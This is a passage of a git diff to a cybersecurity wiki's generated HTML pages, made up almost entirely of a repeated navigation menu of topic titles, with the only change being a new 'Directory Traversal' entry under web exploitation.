      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -174,22 +174,6 @@

The Cyberclopaedia

- - diff --git a/docs/Exploitation/Web/index.html b/docs/Exploitation/Web/index.html index b4188309..fa369a25 100644 --- a/docs/Exploitation/Web/index.html +++ b/docs/Exploitation/Web/index.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -175,22 +175,6 @@

Web

- - diff --git a/docs/Exploitation/Windows/SCF File Attacks.html b/docs/Exploitation/Windows/SCF File Attacks.html index a1b690d6..00b20fa9 100644 --- a/docs/Exploitation/Windows/SCF File Attacks.html +++ b/docs/Exploitation/Windows/SCF File Attacks.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
